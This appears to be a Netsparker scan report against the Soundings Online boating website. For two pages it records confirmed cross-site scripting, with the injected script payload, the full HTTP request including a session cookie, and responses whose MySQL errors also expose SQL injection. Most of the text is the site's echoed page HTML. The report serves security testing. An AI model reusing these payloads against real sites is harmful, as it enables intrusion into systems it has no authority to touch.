document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_used_boat_review m_used_boat_review"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 53, c_used_boat_review<br />Menu: 63, m_used_boat_review-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp..
- /boat-shop/know-how

/boat-shop/know-how CONFIRMED

http://www.soundingsonline.com/boat-shop/know-how?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealer..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00200D)</script>

Request

GET /boat-shop/know-how?'"--></style></script><script>netsparker(0x00200D)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200D)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200D)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/know-how" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Boating Know-How with Mike Saylor</title> <link href="/boat-shop/know-how?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/know-how?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_know_how m_know_how"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 45, c_know_how<br />Menu: 93, m_know_how-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Subscribe</span>&l..
- /boat-shop/on-powerboats

/boat-shop/on-powerboats CONFIRMED

http://www.soundingsonline.com/boat-shop/on-powerboats?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00200B)</script>

Request

GET /boat-shop/on-powerboats?'"--></style></script><script>netsparker(0x00200B)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=majqkkfsuboh8ev9cfeblgcbi6
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:31:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:31:28 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200B)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x00200B)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/on-powerboats" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Take a Closer Look into Powerboating at Soundings Online</title> <link href="/boat-shop/on-powerboats?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/on-powerboats?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_on_powerboats m_on_powerboats"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 49, c_on_powerboats<br />Menu: 81, m_on_powerboats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
